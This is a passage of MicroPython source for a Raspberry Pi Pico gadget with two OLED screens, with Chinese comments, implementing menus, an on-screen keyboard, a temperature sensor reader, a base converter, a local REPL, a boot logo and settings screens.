self.fun_UnitConverter()\n\n # test\n elif index_lis[index_now] == fx:\n self.fx_window()\n elif index_lis[index_now] == IconTest:\n self.fun_IconTest()\n\n # 左按钮\n if ButtonSign == 'l':\n if index_now == 0:\n index_now = index_lis_len - 1\n else:\n index_now -= 1\n # 右按钮\n if ButtonSign == 'r':\n if index_now == index_lis_len - 1:\n index_now = 0\n else:\n index_now += 1\n # 返回按钮\n if ButtonSign == 'n':\n return 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.draw_border() # 绘制边界\n\n self.text_m(index_lis[index_now], 28) # 显示当前选中的功能名\n self.simple_bar(38, index_lis_len, index_now, id=0) # 显示一个条,告诉用户当前位置\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n self.clear(id=1) # 清除所有\n\n self.text_m(\"%02d:%02d:%02d\" % (self.current_time[4], self.current_time[5], self.current_time[6]), 0, id=1)\n\n self.show(id=1) # 绘制所有\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 等待\n\n # 错误弹窗,会在屏幕上打印参数code\n def error_window(self, code='null'):\n self.is_button_ready = 0\n\n width = 100\n height = 50\n self.oled_0.fill_rect(64 - int(width / 2), 32 - int(height / 2), width, height, 0)\n self.oled_0.rect(64 - int(width / 2), 32 - int(height / 2), width, height, 1)\n self.text_m(\"!ERROR!\", 18)\n self.text_m(code, 28)\n self.text_m(\"[PRESS]\", 38)\n self.show()\n while True:\n ButtonSign = self.button_sign()\n if ButtonSign != 0 and self.is_button_ready:\n self.is_button_ready = 0\n return 0\n elif ButtonSign == 0 and not self.is_button_ready:\n self.is_button_ready = 1\n else:\n sleep_ms(50)\n\n # 普通弹窗\n def jump_window(self, title='!Notice!', code='null'):\n self.is_button_ready = 0\n\n width = 100\n height = 50\n self.oled_0.fill_rect(64 - int(width / 2), 32 - int(height / 2), width, height, 0)\n self.oled_0.rect(64 - int(width / 2), 32 - int(height / 2), width, height, 1)\n self.text_m(title, 18)\n self.text_m(code, 28)\n self.text_m(\"[PRESS]\", 38)\n self.show()\n while True:\n ButtonSign = self.button_sign()\n if ButtonSign != 0 and self.is_button_ready:\n self.is_button_ready = 0\n return 0\n elif ButtonSign == 0 and not self.is_button_ready:\n self.is_button_ready = 1\n else:\n sleep_ms(50)\n\n # 输入界面,会返回用户输入的东西\n def input_keyboard(self, msg_already=''):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n line_lis_button = ['OK', 'RE', '<-', '_', '->', 'BS']\n line_lis_0 = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', 'CAP']\n line_lis_1 = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', '-', 'CAP']\n line_lis_2 = ['K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', '*', 'CAP']\n line_lis_3 = ['U', 'V', 'W', 'X', 'Y', 'Z', ':', '$', '%', '&', '/', 'FX']\n line_lis_4 = ['(', '[', '{', '<', '>', '!', '=', ',', '.', '\\'', '\\\"', 'FX']\n line_lis_all = [line_lis_button, line_lis_0, line_lis_1, line_lis_2, line_lis_3, line_lis_4]\n\n # 初始化大小写\n try:\n if self.input_cap_mode == 'a':\n pass\n except Exception:\n self.input_cap_mode = 'a'\n # 初始同步列表里字母大小写\n for lis in line_lis_all:\n for x in range(len(lis)):\n if len(lis[x]) == 1 and self.input_cap_mode == 'A':\n lis[x] = lis[x].upper()\n elif len(lis[x]) == 1 and self.input_cap_mode == 'a':\n lis[x] = lis[x].lower()\n\n msg_input = msg_already # 用户输入的信息\n focus_input = 0 # 输入指针位置\n focus_select_x = 0 # 指针x轴\n focus_select_y = 1 # 指针y轴\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 确认键\n if ButtonSign == 'y':\n focus_now = line_lis_all[focus_select_y][focus_select_x]\n # 确认\n if focus_now == 'OK':\n return str(msg_input)\n # 重置\n elif focus_now == 'RE':\n msg_input = ''\n focus_input = 0\n # 空格\n elif focus_now == '_':\n msg_input += ' '\n focus_input += 1\n # 左移\n elif focus_now == '<-' and focus_input != 0:\n focus_input -= 1\n # 右移\n elif focus_now == '->' and focus_input != len(str(msg_input)):\n focus_input += 1\n # 退格\n elif focus_now == 'BS' and msg_input != '':\n msg_input = list(msg_input)\n if focus_input != 0:\n del msg_input[focus_input - 1]\n msg_input = ''.join(msg_input)\n if focus_input != 0:\n focus_input -= 1\n # CAP\n elif focus_now == 'CAP':\n for lis in line_lis_all:\n for x in range(len(lis)):\n if len(lis[x]) == 1 and self.input_cap_mode == 'A':\n lis[x] = lis[x].lower()\n elif len(lis[x]) == 1 and self.input_cap_mode == 'a':\n lis[x] = lis[x].upper()\n if self.input_cap_mode == 'A':\n self.input_cap_mode = 'a'\n elif self.input_cap_mode == 'a':\n self.input_cap_mode = 'A'\n\n # FX\n elif focus_now == 'FX':\n fx = self.fx_window()\n if fx != 'null':\n msg_input = list(msg_input)\n msg_input.insert(focus_input, fx)\n msg_input = ''.join(msg_input)\n focus_input += len(fx) - 1\n\n # 一般输入\n else:\n msg_input = list(msg_input)\n msg_input.insert(focus_input, focus_now)\n msg_input = ''.join(msg_input)\n focus_input += 1\n\n # 括号\n if focus_now == '(':\n msg_input = list(msg_input)\n msg_input.insert(focus_input, ')')\n msg_input = ''.join(msg_input)\n elif focus_now == '[':\n msg_input = list(msg_input)\n msg_input.insert(focus_input, ']')\n msg_input = ''.join(msg_input)\n elif focus_now == '{':\n msg_input = list(msg_input)\n msg_input.insert(focus_input, '}')\n msg_input = ''.join(msg_input)\n\n # 返回键\n elif ButtonSign == 'n':\n return 'null'\n # 左键\n elif ButtonSign == 'l':\n if focus_select_x == 0:\n focus_select_x = len(line_lis_all[focus_select_y]) - 1\n else:\n focus_select_x -= 1\n # 右键\n elif ButtonSign == 'r':\n if focus_select_x == len(line_lis_all[focus_select_y]) - 1:\n focus_select_x = 0\n else:\n focus_select_x += 1\n # 上键\n elif ButtonSign == 'u':\n if line_lis_all[focus_select_y][focus_select_x] == 'FX':\n focus_select_y = 1\n else:\n if focus_select_y == 0:\n focus_select_y = len(line_lis_all) - 1\n else:\n focus_select_y -= 1\n if focus_select_x > len(line_lis_all[focus_select_y]) - 1:\n focus_select_x = len(line_lis_all[focus_select_y]) - 1\n # 下键\n elif ButtonSign == 'd':\n if line_lis_all[focus_select_y][focus_select_x] == 'CAP':\n focus_select_y = 5\n else:\n if focus_select_y == len(line_lis_all) - 1:\n focus_select_y = 0\n else:\n focus_select_y += 1\n if focus_select_x > len(line_lis_all[focus_select_y]) - 1:\n focus_select_x = len(line_lis_all[focus_select_y]) - 1\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n\n # 打印可输入字符\n for y in range(len(line_lis_all) - 1):\n for x in range(len(line_lis_all[y + 1]) - 1):\n self.oled_0.text(line_lis_all[y + 1][x], 4 + x * 10, 8 + y * 11)\n # 打印CAP\n if self.input_cap_mode == 'A':\n self.oled_0.text(\"C\", 118, 11)\n self.oled_0.text(\"A\", 118, 19)\n self.oled_0.text(\"P\", 118, 27)\n elif self.input_cap_mode == 'a':\n self.oled_0.text(\"c\", 118, 11)\n self.oled_0.text(\"a\", 118, 19)\n self.oled_0.text(\"p\", 118, 27)\n # 打印FX\n self.text_little('fx', 119, 47)\n\n # 绘制主屏指针框\n if focus_select_y != 0 and focus_select_x != len(line_lis_all[focus_select_y]) - 1:\n self.oled_0.rect(4 + focus_select_x * 10 - 1, 8 + (focus_select_y - 1) * 11 - 2, 10, 11, 1)\n elif line_lis_all[focus_select_y][focus_select_x] == 'CAP':\n self.oled_0.rect(117, 9, 10, 27, 1)\n elif line_lis_all[focus_select_y][focus_select_x] == 'FX':\n self.oled_0.rect(117, 45, 11, 9, 1)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n self.clear(id=1) # 清除所有\n\n self.oled_1.text(msg_input, 4, 1)\n self.draw_hline(10, id=1, leng=120)\n self.oled_1.text(\"OK\", 2, 16)\n self.oled_1.text(\"RE\", 21, 16)\n self.oled_1.text(\"<\", 40, 16)\n self.oled_1.text(\"-\", 46, 16)\n self.oled_1.text(\"_\", 57, 14)\n self.oled_1.text(\"-\", 68, 17)\n self.oled_1.text(\">\", 74, 17)\n self.oled_1.text(\"BS\", 85, 17)\n\n # 绘制副屏指针框\n if focus_select_y == 0:\n if focus_select_x == 0:\n self.oled_1.rect(2 - 1, 16 - 2, 2 * 8 + 2, 11, 1)\n elif focus_select_x == 1:\n self.oled_1.rect(21 - 1, 16 - 2, 2 * 8 + 2, 11, 1)\n elif focus_select_x == 2:\n self.oled_1.rect(40 - 1, 16 - 2, 2 * 8 + 1, 11, 1)\n elif focus_select_x == 3:\n self.oled_1.rect(57 - 1, 16 - 2, 1 * 8 + 1, 11, 1)\n elif focus_select_x == 4:\n self.oled_1.rect(68 - 1, 16 - 1, 2 * 8 + 1, 11, 1)\n elif focus_select_x == 5:\n self.oled_1.rect(85 - 1, 16 - 1, 2 * 8 + 2, 11, 1)\n\n # 绘制指针\n self.draw_icon(self.icon_dic.get(\"icon_focus_now\"), 2 + 8 * focus_input, 11, id=1)\n\n self.show(id=1) # 绘制所有\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 函数选择窗口\n def fx_window(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n fx_lis = ['acos()', 'acosh()', 'asin()', 'asinh()', 'atan()', 'atanh()',\n 'cos()', 'cosh()', 'degrees()', 'dist()', 'abs()', 'gcd()',\n 'log()', 'log10()', 'pow()', 'radians()', 'sin()', 'sinh()',\n 'sqrt()', 'tan()', 'tanh()']\n fx_lis.sort()\n focus_y = 0\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n if ButtonSign == 'n':\n return 'null'\n elif ButtonSign == 'y':\n return fx_lis[focus_y]\n elif ButtonSign == 'u':\n if focus_y == 0:\n focus_y = len(fx_lis) - 1\n else:\n focus_y -= 1\n elif ButtonSign == 'd':\n if focus_y == len(fx_lis) - 1:\n focus_y = 0\n else:\n focus_y += 1\n elif ButtonSign == 'l':\n if focus_y - 5 < 0:\n focus_y = focus_y + len(fx_lis) - 5\n else:\n focus_y -= 5\n elif ButtonSign == 'r':\n if focus_y + 5 > len(fx_lis) - 1:\n focus_y = focus_y - len(fx_lis) + 5\n else:\n focus_y += 5\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.oled_0.text('F(x)=', 3, 3) # 提示\n self.oled_0.text('->', 3, 32) # 箭头\n # 打印函数\n for x in range(5):\n if focus_y + x - 2 <= len(fx_lis) - 1:\n self.oled_0.text(fx_lis[focus_y + x - 2], 20, 32 + (x - 2) * 8)\n else:\n self.oled_0.text(fx_lis[focus_y + x - 2 - len(fx_lis)], 20, 32 + (x - 2) * 8)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 分支功能部分 # 子界面模板\n def fun_model(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n # self.draw_border() # 绘制边界\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 温度/湿度传感器SHT-31\n def fun_SHT31(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始��记秒器\n\n sht31 = sht30.SHT30(sda_pin=8, scl_pin=9)\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n if ButtonSign == 'n':\n return 0\n\n elif ButtonSign == 0 and not self.is_button_ready:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n if self.frame_counter == 0:\n self.clear() # 清除所有\n self.draw_border() # 绘制边界\n\n sht_lis = sht31.measure_int()\n t = (\"%2d.%2d\" % (sht_lis[0], sht_lis[1]))\n h = (\"%2d.%2d\" % (sht_lis[2], sht_lis[3]))\n\n self.oled_0.text(\"Temp= \" + str(t) + \" C\", 10, 18)\n self.oled_0.text(\"RH= \" + str(h) + \" %\", 26, 28)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.draw_icon(self.icon_dic.get('icon_°'), 103, 18)\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0:\n self.clear(id=1) # 清除所有\n\n # 显示一个简易时钟\n self.text_m(\"%02d:%02d:%02d\" % (self.current_time[4], self.current_time[5], self.current_time[6]), 0, id=1)\n\n self.show(id=1) # 绘制所有\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 进制转换器\n def fun_BaseConverter(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n focus_lis = ['HEX', 'DEC', 'OCT', 'BIN', 'RESET']\n focus_lis_len = len(focus_lis)\n focus_now = 0\n\n var_BASE = 0 # BASE变量,本质上是十进制\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 返回按钮\n if ButtonSign == 'n':\n return 0\n # 左或上按钮\n if ButtonSign == 'l' or ButtonSign == 'u':\n if focus_now == 0:\n focus_now = focus_lis_len - 1\n else:\n focus_now -= 1\n # 右或下按钮\n if ButtonSign == 'r' or ButtonSign == 'd':\n if focus_now == focus_lis_len - 1:\n focus_now = 0\n else:\n focus_now += 1\n # 确定按钮\n if ButtonSign == 'y':\n try:\n if focus_lis[focus_now] == 'HEX':\n temp = str(self.input_keyboard())\n if temp != 'null':\n var_BASE = int(temp, 16)\n elif focus_lis[focus_now] == 'DEC':\n temp = str(self.input_keyboard())\n if temp != 'null':\n var_BASE = int(temp)\n elif focus_lis[focus_now] == 'OCT':\n temp = str(self.input_keyboard())\n if temp != 'null':\n var_BASE = int(temp, 8)\n elif focus_lis[focus_now] == 'BIN':\n temp = str(self.input_keyboard())\n if temp != 'null':\n var_BASE = int(temp, 2)\n elif focus_lis[focus_now] == 'RESET':\n var_BASE = 0\n except ValueError:\n self.error_window(\"ValueError\")\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n # 根据BASE计算其他进制\n var_HEX = hex(var_BASE)\n var_DEC = var_BASE\n var_OCT = oct(var_BASE)\n var_BIN = bin(var_BASE)\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.draw_border() # 绘制边界\n\n # HEX\n self.oled_0.text(\"HEX=\", 3, 8)\n if len(str(var_HEX)[2:]) <= 10:\n self.oled_0.text(str(var_HEX)[2:], 3 + 35, 8)\n else:\n self.text_little(str(var_HEX)[2:], 3 + 35, 8 + 2)\n # DEC\n self.oled_0.text(\"DEC=\", 3, 18)\n if len(str(var_DEC)) <= 10:\n self.oled_0.text(str(var_DEC), 3 + 35, 18)\n else:\n self.text_little(str(var_DEC), 3 + 35, 18 + 2)\n # OCT\n self.oled_0.text(\"OCT=\", 3, 28)\n if len(str(var_OCT)[2:]) <= 10:\n self.oled_0.text(str(var_OCT)[2:], 3 + 35, 28)\n else:\n self.text_little(str(var_OCT)[2:], 3 + 35, 28 + 2)\n # BIN\n self.oled_0.text(\"BIN=\", 3, 38)\n if len(str(var_BIN)[2:]) <= 10:\n self.oled_0.text(str(var_BIN)[2:], 3 + 35, 38)\n else:\n self.text_little(str(var_BIN)[2:], 3 + 35, 38 + 2)\n # RESET\n self.text_m(\"RESET\", 48)\n\n if focus_now == 0:\n self.oled_0.rect(37, 6, 88, 11, 1)\n elif focus_now == 1:\n self.oled_0.rect(37, 16, 88, 11, 1)\n elif focus_now == 2:\n self.oled_0.rect(37, 26, 88, 11, 1)\n elif focus_now == 3:\n self.oled_0.rect(37, 36, 88, 11, 1)\n elif focus_now == 4:\n self.oled_0.rect(40, 46, 48, 11, 1)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0:\n self.clear(id=1) # 清除所有\n\n self.text_m(\"%02d:%02d:%02d\" % (self.current_time[4], self.current_time[5], self.current_time[6]), 0, id=1)\n\n self.show(id=1) # 绘制所有\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 测试自定义符号\n def fun_IconTest(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n if ButtonSign == 'n':\n return 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n\n for i in range(len(self.icon_dic_keys)):\n self.draw_icon(self.icon_dic.get(self.icon_dic_keys[i]), (i % 30) * 4, (i // 30) * 6 + 20)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # REPL\n def fun_REPL(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n # 指令相关\n command = ''\n # 指针相关\n focus_now = 0\n focus_lis = ['input', 'OK', 'RE']\n # 历史记录\n history_lis = []\n\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 确认键\n if ButtonSign == 'y':\n # 输入框\n if focus_lis[focus_now] == 'input':\n temp = self.input_keyboard(msg_already=command)\n focus_now = 1\n if temp != 'null':\n command = temp\n # OK\n elif focus_lis[focus_now] == 'OK' and command != '':\n history_lis.insert(0, \" \" + command)\n\n try:\n if command.startswith(\"print\"):\n command = command[6:-1]\n\n eval_result = eval(command)\n history_lis.insert(0, \">>>\" + str(eval_result))\n except SyntaxError:\n history_lis.insert(0, \">>>\" + \"SyntaxError\")\n except NameError:\n history_lis.insert(0, \">>>\" + \"NameError\")\n\n command = ''\n # 重置\n elif focus_lis[focus_now] == 'RE':\n command = ''\n\n # 退出键\n elif ButtonSign == 'n':\n return 0\n # 左键\n elif ButtonSign == 'l':\n if focus_now == 0:\n focus_now = len(focus_lis) - 1\n else:\n focus_now -= 1\n # 右键\n elif ButtonSign == 'r':\n if focus_now == len(focus_lis) - 1:\n focus_now = 0\n else:\n focus_now += 1\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n if self.frame_counter % self.refresh_scale == 0:\n self.clear(id=0)\n for i in range(len(history_lis)):\n self.oled_0.text(history_lis[i], 0, 64 - 8 - i * 8)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show(id=0)\n\n ###副屏幕内容###\n # if self.frame_counter % self.refresh_scale == 0:\n if 1:\n self.clear(id=1)\n\n self.text_little(command, 4, 3, 1)\n self.oled_1.text(\"OK\", 2, 16)\n self.oled_1.text(\"RE\", 21, 16)\n\n if focus_lis[focus_now] == 'input':\n self.draw_hline(10, id=1, leng=120)\n elif focus_lis[focus_now] == 'OK':\n self.oled_1.rect(2 - 1, 16 - 2, 2 * 8 + 2, 11, 1)\n elif focus_lis[focus_now] == 'RE':\n self.oled_1.rect(21 - 1, 16 - 2, 2 * 8 + 2, 11, 1)\n\n self.show(id=1)\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 开机logo\n def fun_BootLogo(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = 0 # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n # Raspberry Pi logo as 32x32 bytearray\n logo = bytearray(\n b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00|?\\x00\\x01\\x86@\\x80\\x01\\x01\\x80\\x80\\x01\\x11\\x88\\x80\"\n b\"\\x01\\x05\\xa0\\x80\\x00\\x83\\xc1\\x00\\x00C\\xe3\\x00\\x00~\\xfc\\x00\\x00L'\\x00\\x00\\x9c\\x11\\x00\\x00\\xbf\\xfd\\x00\"\n b\"\\x00\\xe1\\x87\\x00\\x01\\xc1\\x83\\x80\\x02A\\x82@\\x02A\\x82@\\x02\\xc1\\xc2@\\x02\\xf6>\\xc0\\x01\\xfc=\\x80\\x01\\x18\\x18\"\n b\"\\x80\\x01\\x88\\x10\\x80\\x00\\x8c!\\x00\\x00\\x87\\xf1\\x00\\x00\\x7f\\xf6\\x00\\x008\\x1c\\x00\\x00\\x0c \"\n b\"\\x00\\x00\\x03\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\")\n\n # Load the raspberry pi logo into the framebuffer (the image is 32x32)\n logo = framebuf.FrameBuffer(logo, 32, 32, framebuf.MONO_HLSB)\n\n tim = Timer()\n tim.init(mode=Timer.ONE_SHOT, period=3000, callback=self.timer_shot_BootLogo)\n self.timer_cond_BootLogo = 0\n\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n return 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n if self.timer_cond_BootLogo:\n tim.deinit()\n return 0\n\n ###主屏幕内容###\n self.clear() # 清除所有\n\n self.oled_0.blit(logo, 64 - 16, 32 - 16)\n self.text_m(\"Powered by RP2\", 32 + 16 + 4)\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n def timer_shot_BootLogo(self, _):\n self.timer_cond_BootLogo = 1\n\n # 设置弹窗\n def fun_Setting(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n focus_now = 0\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n if ButtonSign == 'l' or ButtonSign == 'u':\n if focus_now:\n focus_now = 0\n else:\n focus_now = 1\n elif ButtonSign == 'r' or ButtonSign == 'd':\n if focus_now:\n focus_now = 0\n else:\n focus_now = 1\n elif ButtonSign == 'y':\n if focus_now == 0:\n self.fun_SettingSwitch()\n elif focus_now == 1:\n self.fun_SettingTime()\n elif ButtonSign == 'n':\n return 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.draw_border() # 绘制边界\n\n self.oled_0.text(\"Choose:\", 24, 13)\n self.oled_0.text(\"Set Switch\", 24, 28)\n self.oled_0.text(\"Set Time\", 24, 43)\n\n self.oled_0.text(\"->\", 4, focus_now * 15 + 28)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0:\n self.clear(id=1)\n self.text_m(\"[Yes] to Confirm\", 16 - 9, id=1)\n self.text_m(\"[NO] to Return \", 16, id=1)\n self.show(id=1)\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 设置(开关)\n def fun_SettingSwitch(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n # 将字典复制为列表\n setting_lis = list(self.setting_dic.items())\n for i in range(len(setting_lis)):\n setting_lis[i] = list(setting_lis[i])\n\n focus_y = 0 # 当前选择\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 返回键\n if ButtonSign == 'n':\n return 0\n # 确认键\n elif ButtonSign == 'y':\n self.setting_dic = dict(setting_lis)\n self.setting_control(mode='update')\n self.jump_window(code=\"Updated!\")\n return 0\n # 上\n elif ButtonSign == 'u':\n if focus_y == 0:\n focus_y = len(setting_lis) - 1\n else:\n focus_y -= 1\n # 下\n elif ButtonSign == 'd':\n if focus_y == len(setting_lis) - 1:\n focus_y = 0\n else:\n focus_y += 1\n # 左\n elif ButtonSign == 'l':\n if setting_lis[focus_y][1]:\n setting_lis[focus_y][1] = 0\n else:\n setting_lis[focus_y][1] = 1\n # 右\n elif ButtonSign == 'r':\n if setting_lis[focus_y][1]:\n setting_lis[focus_y][1] = 0\n else:\n setting_lis[focus_y][1] = 1\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.oled_0.text('->', 3, 32) # 箭头\n\n for i in [-2, -1, 0, 1, 2]:\n\n try:\n if focus_y + i >= 0:\n # 打印选项名\n if len(setting_lis[focus_y + i]) <= 9:\n self.oled_0.text(setting_lis[focus_y + i][0], 20, 32 + i * 8)\n else:\n self.text_little(setting_lis[focus_y + i][0], 20, 32 + i * 8)\n # 打印状态\n if setting_lis[focus_y + i][1]:\n self.oled_0.text(\"En\", 100, 32 + i * 8)\n else:\n self.oled_0.text(\"Dis\", 100, 32 + i * 8)\n else:\n pass\n except Exception:\n pass\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0:\n self.clear(id=1)\n self.text_m(\"[Yes] to Confirm\", 16 - 9, id=1)\n self.text_m(\"[NO] to Return \", 16, id=1)\n self.show(id=1)\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 设置(时间)\n def fun_SettingTime(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n # sec min hour week day mon year\n NowTime = b'\\x00\\x00\\x15\\x04\\x21\\x01\\x21'\n\n focus_now = 0 # 当前选择\n setting_lis = ['Set Hour', 'Set Minute', 'Set Second',\n 'Set Year', 'Set Month', 'Set Day', 'Set Week']\n week_lis = [\"Mon\", \"Tues\", \"Wed\", \"Thur\", \"Fri\", \"Sat\", \"Sun\"]\n while True:\n self.current_time = self.rtc.datetime()\n self.ds3231_time = ds3231.ReportList() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 